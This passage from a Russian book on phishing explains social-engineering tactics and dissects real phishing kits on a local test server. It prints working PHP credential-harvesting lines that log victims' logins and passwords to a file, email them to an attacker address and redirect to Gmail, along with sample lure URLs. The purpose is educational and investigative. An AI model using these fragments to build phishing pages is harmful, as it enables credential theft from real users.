себя заморачивать разнообразием паролей и ключевых фраз и везде, где ему приходилось регистрироваться, указывал один и тот же
пароль, что очень повеселило жуликов.
В другой похожей истории злодеям пришлось поработать немного больше. Для получения пароля от бдительной гражданки злодеи
создали полнофункциональный онлайн-магазин, рекламу которого
забросили жертве на почту. Предложения в магазине были настолько привлекательными, что наша гражданка не удержалась и решила
совершить покупку.
Как выяснилось, для совершения покупки необходимо было создать аккаунт, то есть зарегистрироваться в магазине, а для полнойпреполной защиты персональных данных (а гражданка к защите
своих персональных данных относилась достаточно серьезно) необходимо было придумать несколько вариантов пароля и ключевую
фразу. Эффект был тот же, что и в предыдущем случае, а вложенные
злоумышленниками средства и усилия с лихвой окупились.
Другая группа хакеров изощренными путями затягивала жертв
регистрироваться на модном сайте, для активации аккаунта на котором, как писала администрация модного сайта, нужно ввести код
безопас­ности, который будет высылаться посредством SMS на указанный пользователем абонентский номер.
Предвосхищая недоумение от простоты и гениальности данной
затеи, следует заметить, что модный сайт просуществовал недолго,
но несколько десятков успешных копирований содержимого элект­
ронной переписки с зарубежного почтового сервера было-таки проведено.
Итак, как уже упоминалось, ставшая очень популярной методика двухфакторной авторизации также не устояла под натиском со­
циальной инженерии.
При целевой атаке на предприятие осуществляются тщательный
подбор и анализ сотрудников. В каких-то случаях доступ можно

46

Хищение паролей методом фишинг-атак

получить, введя в заблуждение новенького сотрудника компании,
представившись системным администратором или сотрудником
службы безопас­ности.
В любом случае, перед атакой злоумышленники могут воспользоваться доступными способами сбора информации о человеке или
организации, основанными на использовании открытых источников (OSINT, или также называемой public intelligence)1.

Опубликованные
пользователем данные:
резюме, статьи,
научные работы

Социальные сети:
профили атакуемого,
профили связей

Опубликованная
компанией информация:
отчеты, вакансии, реклама,
выступления, статьи

Используемые
акккаунты различных
онлайн-сервисов

Рис. 1.14. Упрощенная схема сбора информации перед атакой

Статистика же показывает, что сотрудникам финансового департамента (бухгалтерии) закинуть наживку проще, что доказано на
практике хищений денежных средств посредством использования
систем дистанционного банковского обслуживания. Связано это,
возможно, с тем, что в нашей стране постоянно что-то меняется
в формах и видах отчетности в налоговых, пенсионных и других
важных государственных структурах, в связи с чем бухгалтеры потоком по электронной почте получают всевозможные рассылки
новостей, дополнительных инструкций, вестников, калькуляторов
и программ.
После предварительного сбора списка подходящих сотрудников
организации производится сбор данных об их сфере деятельности,
1

Open source intelligence, OSINT, public intelligence – разведка на основе открытых
источников.

Роль социальной инженерии в фишинг-атаке

47

зонах ответственности и связях. Затемзлоумышленники на основе
анализа полученной информации приступают к разработке сценариев атак.
С точки зрения психологии атака с использованием социальной
инженерии всегда идет в обход аналитических инструментов разума.
Она действует преимущественно на уровне эмоциональной сферы.
Основатель экспериментальной психологии Вильгельм Максимилиан Вундт небезосновательно рассматривал роль чувств и эмоций
в поведении человека. Согласно Вундту, вследствие физического
истощения ассоциативные наклонности начинают преобладать над
другими побуждениями.
Переосмыслив это, можно понять, что движет человеком, вводящим свой пароль при фишинг-атаке или открывающим документ
якобы из налогового органа, пришедший в пятницу под конец рабочего дня.
Часто при атаке эксплуатируются различные чувства человека: сострадание, тщеславие, страх и другие, побуждая человека выполнить
определенное действие, лишь бы поскорее отделаться от упавшей
на него проблемы. Нередко атакующим удается сыграть на жажде
легкой наживы, боязни потерять деньги, работу или репутацию.
При целенаправленной атаке учитывается доверчивость пользователя к знакомым адресам электронной почты, которая выражается в использовании для взлома одного человека через почту его
знакомого или близкого человека.
Для восприятия реальности и истинных целей операций мозг
жертвы может перегружаться информационной атакой, сходной по
действию с DoS-атакой1.
В качестве доказательств наличия простых уязвимостей человеческого разума можно привести простой пример психологии – эффект Струпа (англ. Stroopeffect). Так называют задержку реакции
при прочтении слов, когда цвет слов не совпадает с написанными
словами, к примеру слово «синий» написано красным. Мозг воспринимает цвет, но он реагирует на слово, которое пишется первым.
Вообще, аналогия центральной нервной системы человека (мозга)
с процессором, а памяти – с носителями информации несет в себе
много интересных размышлений.
1

Denial of Service – отказ в обслуживании.

48

Хищение паролей методом фишинг-атак

Жертву направляют к принятию решения, к цепочке определенных действий.
Нужно обратить внимание и на изучаемую ранее психологией
особенность профессий конвейерного производства. Причем тут это?
Работа сотрудника конвейера, выполняющего однообразные действия, нередко может привести к развитию психического состояния –
монотонии. Монотония – функциональное состояние человека, возникающее при однообразной, монотонной деятельности. Характерно
снижением тонуса и восприимчивости, ослаблением сознательного
контроля, ухудшением внимания и памяти, стереотипизацией действий, появлением ощущения скуки, потерей интереса к работе1.
Однообразие выполняемых операций относится не только к работнику производства конвейерного типа, но и к большинству сотрудников современного офиса, выполняющих ряд однообразных
операций: кликнул, получил, пролистал, отправил, кликнул, пролистал, удалил...
Уже не секрет, что текст, занимающий больше листа бумаги или
не умещающийся целиком на экране монитора, читается в лучшем
случае через строчку или по диагонали. И человек автоматически
ищет маячки – подсказки (ключевые слова), чтобы быстрее понять,
для чего «это» нужно и куда «это» деть, не стараясь вникнуть в суть
происходящего.
Существует байка про офисного работника, который до того доработался, что на полученное по электронной почте уведомление об
увольнении машинально отправил в ответ письмо: «Ваше предложение получено, будет рассмотрено нашими специалистами, и мы
направим Вам информацию о принятом решении. Спасибо за выбор нашей компании!» Без сложной психологической терминологии складывающуюся ситуацию можно описать еще и так: «смотрю
в книгу – вижу фигу».
Как бы это грубо не звучало, но фактически это так. Пользователь
компьютера нередко не замечает расширений файлов, а следовательно, часто щелкает мышкой или открывает их, или запускает на
исполнение, не задумываясь о типе файлов и возможных последствиях. Недаром самым популярным способом слепой фишинговой
атаки считается распространение под видом музыкальных композиций, фильмов, изображений или документов, файлов с расшире1

Головин С. Ю. Словарь практического психолога. М.: АСТ; Харвест, 1998.

Фишинг изнутри. Анализ используемых для атаки инструментов

49

нием «.exe». Эти и другие варианты подробнее будут рассмотрены
в части «Комбинированные атаки с использованием фишинга».
Стоит упомянуть также способ, влияющий на общее восприятие человеком информации. К примеру, перед фишинг-атакой
злоумышленником от имени пользователя (жертвы) по известным
жертве контактам осуществляется разного рода спам-рассылка. При
этом письмо полностью имеет вид, как будто оно было отправлено
с электронного ящика жертвы.
При получении спама от жертвы его знакомые, партнеры или другие лица из его контактов сообщат пользователю о происходящей
якобы с принадлежащего ему электронного ящика спам-рассылке,
что, скорее всего, вызовет подозрение о возможном взломе его поч­
тового ящика.
Немного выждав, злоумышленники могут осуществить классическую фишинг-атаку от имени администрации электронного сервиса,
на котором размещен аккаунт, с просьбой сменить пароль и подтвердить его легитимное использование. В присланном письме будет содержаться ссылка на настройки учетной записи, в действительности размещенная на фишинг-движке.
Существует бесчисленное количество вариантов для атак с использованием социальной инженерии, ограниченное только информацией о потенциальной жертве и собственным воображением
нападающего.
Одно очевидно: знание основ и тактики применения социальной
инженерии способно защитить от большинства негативных проявлений. Понимание основных принципов социальной инженерии
должно учитываться при проектировании средств защиты компьютерной информации, разработке регламентов информационной
безопас­ности (инструкций для пользователей) и, несомненно, поможет при расследовании уже произошедших инцидентов информационной безопас­ности.

1.3. Фишинг изнутри. Анализ используемых
для атаки инструментов
С точки зрения пользователя любой сайт – это набор элементов, таких как текст, изображения, а также аудио-видео, анимация и прочие
визуальные эффекты, ссылки на другие разделы и сайты. В реаль­

50

Хищение паролей методом фишинг-атак

ности за любым интерфейсом сайта находится большое число процессов, в которых задействованы различные узлы компьютерного
оборудования и комплексы программного обеспечения.
За то, как будет выглядеть сайт, отвечают специальные языки
программирования, которые могут быть серверными или клиентскими. Исполнение серверной программы осуществляется на стороне сервера, клиентской – в браузере пользователя.
На стороне клиента, в его браузере осуществляется выполнение
(интерпретация) HTML-кода, java-скриптов, таблиц стилей (CSS).
Для того чтобы сайт обладал функциональностью и мог обрабатывать информацию, используются языки веб-программирования,
наиболее популярными из которых является PHP1.
Программу на PHP можно написать в обычном текстовом файле,
изменить расширение на «.php», и она будет работать на сервере.
То есть для языка PHP не требуется специализированная среда разработки, хотя на самом деле их существует масса.
Не будем рассматривать обработку PHP-кода сервером, это не является темой книги. Просто кратко укажем возможности программ
на PHP: работа с базами данных, обработка и передача информации,
использование почтовых протоколов (IMAP, POP3, SMTP).
Из всех возможных вариантов получения несанкционированного
(скрытого) доступа к учетной записи самым эффективным на сегодняшний день является использование фишинг-движков, также называемых фэйками. Основан этот метод на веб-программировании
и социальной инженерии.

Схема взаимодействия с почтовым сервером
Теперь рассмотрим две схемы обращения пользователя к интерфейсу ресурса: штатной работы пользователя с почтовым сервером
и работы пользователя, когда вмешивается фишинг (рис. 1.15, 1.16).
Получение пароля для доступа к электронному почтовому адресу
без его модификации осуществляется посредством использования
фишинг-движков, визуально имитирующих интерфейс сервиса, на
базе которого находится учетная запись. Цель атаки достигнута,
1

PHP (англ. PHP: Hypertext Preprocessor – «PHP: препроцессор гипертекста»; первоначально Personal Home Page Tools – «инструменты для создания персональных веб-страниц») – скриптовый язык общего назначения.

Фишинг изнутри. Анализ используемых для атаки инструментов

51

если пользователь не заметил, что в процессе работы со своей поч­
той он совершил путешествие на сервер с фэйком и обратно.
Пользователь

Пользователь
Открытие интерфейса
почтового аккаунта

Открытие
интерфейса
почтового
аккаунта

Ввод иденти­
фикационных
данных
Браузер пользователя
Авторизация
Сервер
почтового
сервиса

Ввод иденти­
фикационных
данных
Браузер пользователя
Авторизация
Сервер
почтового
сервиса
Доступ
к содержимому
почтового аккаунта
Операции
с письмами
Браузер пользователя

Рис. 1.15. Упрощенная
схема штатной работы
с почтовым сервером

Переход на сервер
злоумышленника

Доступ
к содержимому
почтового аккаунта
Операции
с письмами

Сервер
фишинг-ресурса

Браузер пользователя

Псевдо­
Возврат в интерфейс
авторизация
почтового сервиса
Ввод иденти­
фикационных
данных
Браузер пользователя

Рис. 1.16. Схема работы с почтовым ящиком
при фишинге

Три основные функции фишинг-движка
Движки выполняют три основные функции:
имитация интерфейса по заданной ситуации, связанной с операциями пользователя (авторизация, получение файла, изменение настроек учетной записи и многое другое);
копирование и обработка незаконно полученных учетных данных пользователя;
возврат пользователя на соответствующую ситуации страницу
официального сервиса.

52

Хищение паролей методом фишинг-атак

Для того чтобы движок заработал, его нужно собрать. Он состоит
из элементов (картинок, текста, ссылок и анимации), скопированных с официального интернет-ресурса, и программ-скриптов, напи­
санных злоумышленником.
Собранный и готовый к работе движок злоумышленник размещает на сервере (виртуальном хостинге) и «прикручивает» к нему
заранее подготовленное доменное имя.
Учитывая, что в состав движка, кроме статических данных и htmlразметки, входят программы, написанные на языках программирования, для функционирования фэйка необходимы определенные
минимальные требования системного окружения хостинга.
Разобрать детально механизм фишинг-сайта (фэйка) необходимо
по нескольким серьезным причинам:
во-первых, непонимание всего механизма приводит к заблуждению по поводу технической сложности фишинг-атак;
во-вторых, непонимание технической стороны фишинг-сайта
приводит к ошибочной квалификации преступных действий
злоумышленников;
в-третьих, не зная принципов создания фишинг-движков, многие продолжают верить в реальную действенность методов автоматической защиты от фишинг-атак.
Для подробного рассмотрения движков в локальной среде не потребуется заморский или абузоустойчивый хостинг1.
Воспользуемся теми же доступными и легальными средствами, которыми пользуются злоумышленники для проверки интерфейса и отработки программ, входящих в состав движков. К таким средствам относятся программы, имитирующие работу полноценного веб-сервера.

Демонстрация механизма функционирования
фишинг-движков на локальном сервере
Для демонстрации будем использовать AMPPS – набор решений,
включающий в себя Apache, MySQL, MongoDB, PHP, Perl и Python для
Windows, Linux и Mac2.
1

2

Абуза – на сленге работников телекоммуникационных услуг – жалоба, направленная в адрес владельца сервера (хостинга) или другого сервиса на возможные неправомерные действия его клиентов.
AMPPS был создан компанией Softaculous Ltd. http://ampps.com/.

Фишинг изнутри. Анализ используемых для атаки инструментов

53

Рис. 1.17. Окно программы AMPPS

Такой вот вид локального сервера можно лицезреть после его
установки (рис. 1.18):

Рис. 1.18. Отображение localhost
после установки AMPPS

В настройки платформы AMPPS углубляться не требуется, все,
что необходимо, уже стоит так, как нужно (при инсталляции «по
умолчанию»).

54

Хищение паролей методом фишинг-атак

Для проверки работоспособности установленного сервера в директории создаем текстовый файл (рис. 1.19).

Рис. 1.19. Создание текстового файла в директории веб-сервера AMPPS

Вносим в созданный файл строчки (рис. 1.20).
Сохраняем файл под именем index.php и проверяем, как работает
локальный веб-сервер, видим результат выполнения php-скрипта
(рис. 1.21).
Результат означает, что сервер работает и PHP-скрипты интерпретируются, что и требуется для дальнейшей демонстрации.

Фишинг изнутри. Анализ используемых для атаки инструментов

55

Рис. 1.20. Код для проверки интерпретации PHP

Рис. 1.21. Результат исполнения PHP-скрипта

Фишинг-движок изнутри. Пример 1
Рассмотрим первый готовый фэйк (фишинг-движок). В него входят
два файла с расширением «.php»: index.php и login.php (рис. 1.22).

56

Хищение паролей методом фишинг-атак

Рис. 1.22. Файлы фишинг-движка

В файле index.php располагается масса элементов, отвечающих за
интерфейс фишинг-движка.
При интерпретации данного скрипта сервер предоставляет пользователю интерфейс почтового сервера и поля (или поле) для ввода
данных. Этот файл также содержит инструкции, куда их направлять
на обработку (рис. 1.23).

Рис. 1.23. Содержимое файла index.php фишинг-движка

В данном рассматриваемом случае у фишинг-движка интерфейс,
который злоумышленники украли у официального почтового сервиса1 (рис. 1.24).

1

Почтовый сервис gmail.com компании Google.

Фишинг изнутри. Анализ используемых для атаки инструментов

57

Рис. 1.24. Интерфейс фишинг-движка

Следующий файл login.php не менее важен, именно к нему осуществляется обращение из интерфейса, создаваемого файлом
index.php, при нажатии кнопки (или других определяемых программой операциях) (рис. 1.25).

Рис. 1.25. Интерфейс фишинг-движка

58

Хищение паролей методом фишинг-атак

Для того чтобы не отпугнуть неподготовленного читателя массой
непонятных строчек кода, пройдемся по основным строчкам программы и разберемся в псевдосложной внутренней начинке фишинг-движков.
Строчкой
$valid_file = “aspushkin.txt”;

задается файл, в который программа будет записывать получаемые
учетные данные.
Далее:
$email = «testP99800@yahoo.com»;
$location = “http://mail.google.com”;

Задается адрес электронной почты, куда программа будет отправлять вновь поступающие данные в онлайн-режиме, в рассмат­
риваемом примере это testP99800@yahoo.com, и определяется ресурс, куда будет отправляться пользователь после получения от него
всего, чего хотелось злоумышленнику, в данном случае – http://mail.
google.com.
Можно задать любой ресурс для возврата пользователя, практически все, что угодно, но злоумышленники в целях конспирации
отправляют пользователя обратно «домой» в его учетную запись на
родной официальный почтовый сервер, откуда его обманом и вытянули.
Операции в строке
if($login == “” || $pass == “”) { header(“Location: index.
php?err&login=”.$login); exit; }

осуществляют проверку на возможность пустых значений вместо
введенных пользователем своих данных о логине и пароле.
Следующий блок строк:
if($valid_file != “”)
{
$file = fopen($valid_file, ‘a’);
fwrite($file, “$login:$pass\r\n”);
fclose($file);
}

В этом месте скрипт открывает файл, предназначенный для запи­
си украденных данных, и осуществляет в него запись логина и па-

Фишинг изнутри. Анализ используемых для атаки инструментов

59

роля пользователя. В приведенном примере в текстовый файл aspushkin.txt по порядку записываются поступающие данные, после
чего файл закрывается.
Стоит также обратить внимание на строки:
if($email != “”) mail($email, “Data from google”, “$login:$pass”);
header(‘Location: ‘.$location);

При выполнении функций первой строки осуществляется отправка данных на установленный в настройках движка электронный
потовый адрес злоумышленника, а второй отправляет пользователя
по заданному адресу, после чего шоу окончено.
Пройдем этот путь. Открываем наш localhost, работающий под
установленной ранее AMPPS, и наблюдаем интерфейс подставного почтового сервера, который так и манит ввести логин и пароль
(рис. 1.26).

Рис. 1.26. Интерфейс фишинг-движка

Нужно понимать, что на эту страницу фэйка пользователь попадает по ссылке вида:
http://ФИШИНГ-ДОМЕН/?Login=ЛОГИН-ПОЛЬЗОВАТЕЛЯ&Domain=ДОМЕН ПОЛЬЗОВАТЕЛЯ
&id=mojnovstavitidnuonnenujen12433644800000023780&msg=chtotoochennujn
oe17823612391283756

60

Хищение паролей методом фишинг-атак

В данном случае используется тривиальная, но великолепная возможность языка PHP под определением «ассоциативный массив
параметров, переданных скрипту через URL».
Если проще, то данная возможность позволяет передавать данные, внедряя их в строку ссылки. Поэтому нужно открыть эту страницу правильно. Вот так, например, на страницу попадает пользователь с логином «pochtauserar» по ссылке http://localhost/index.
php?login=pochtauserar& (рис. 1.27):

Рис. 1.27. Интерфейс фэйка c именем пользователя,
переданным через строку ссылки

Теперь интерфейс фишинг-движка встречает нас практически персонально, с указанием нашего логина электронной почты на странице.
Не будем заставлять его долго ждать и введем свои учетные данные, а вернее пароль: «superpassword».
Если проверить теперь файл aspushkin.txt, можно убедиться, что
введенный пароль, а также имя нашей учетной записи успешно
запи­саны в файл: «pochtauserar:superpassword».

Рис. 1.28. Учетные данные,
сохраненные в текстовом файле на сервере

Фишинг изнутри. Анализ используемых для атаки инструментов

61

Помимо этого, мы помним, что введенные данные были отправлены на электронный адрес, заданный в файле фишинг-движка.

Фишинг-движок изнутри. Пример 2
Теперь рассмотрим более интересный экземпляр фэйка, с имитацией загрузки файла, который по статистике очень «нравится» пользователям.
Он состоит из следующих файлов (рис. 1.29):

Рис. 1.29. Файлы фишинг-движка

Имитация обращения к присланному в письме злоумышленником файлу выглядит следующим образом (рис. 1.30):

Рис. 1.30. Имитация обращения к файлу

В данном случае пользователь пытается открыть присланный
файл schet.pdf.
При этом пробегает анимированная полоса загрузки, создающая
иллюзию процесса, но что-то, видимо, пошло не так, и для продолжения требуется авторизация (рис. 1.31).

62

Хищение паролей методом фишинг-атак

Рис. 1.31. Окно авторизации фэйка

В настройках данного фишинг-движка приблизительно то же самое, что и в предыдущем примере, кроме дополнительного программного файла, содержащего сценарий загрузки несуществую­
щего файла, в данном случае это файл view.php. Фрагмент его
содержимого приведен на рис. 1.32.
В файле login.php содержатся параметры, которые злоумышленник может изменять от случая к случаю (рис. 1.33).
В данном примере злоумышленник определяет страницу (параметр $fake), на которой находится главная страница фишинг-движка. В тегах … для поддержания легенды указывает
имя файла, который очень хочет посмотреть пользователь, здесь он
schet.pdf.
При подготовке ссылки на страницу с использованием такого
фишинг-движка злоумышленник так же, как и в первом рассмот­
ренном примере, посредством ассоциативного массива параметров
передает данные о логине пользователя и якобы присланном ему
файле:
http://localhost/view2.php?id=schet.pdf&login=pochtauser&server=gmail-files

Фишинг изнутри. Анализ используемых для атаки инструментов

Рис. 1.32. Фрагмент содержимого файла view.php

Рис. 1.33. Фрагмент содержимого файла view.php

63

64

Хищение паролей методом фишинг-атак

Фишинг-движок изнутри. Пример 3
Рассмотрим другой пример фэйка.
Интересен он тем, что в нем добавлена функция проверки правильности введенного пароля пользователем.

Автоматическая проверка похищенного пароля
Происходит это посредством функции fsockopen, которая внедрена
в файл index.php этого движка.
Интерфейс движка (см. рис. 134) также был бессовестно позаимствован у официального сервиса1 с одной лишь только целью – ввес­
ти в заблуждение пользователя и не дать ему повода засомневаться,
что вводимые им данные (пароль) могут отправиться куда-либо,
кроме официального почтового сервера.

Рис. 1.34. Интерфейс фэйка

Функция проверки корректности вводимых жертвой данных была
введена ленивыми хакерами, которые делают фонтаны рассылок –
1

Почтовый сервис https://mail.ru/ компании Mail.Ru Group.

Фишинг изнутри. Анализ используемых для атаки инструментов

65

слепых фишинговых атак – и лишний раз не хотят расстраиваться,
если пользователь во время того, как его пароль пытались спереть,
«очепятался» при вводе своего логина или пароля.
Фрагмент листинга, осуществляющего проверку вводимых
данных: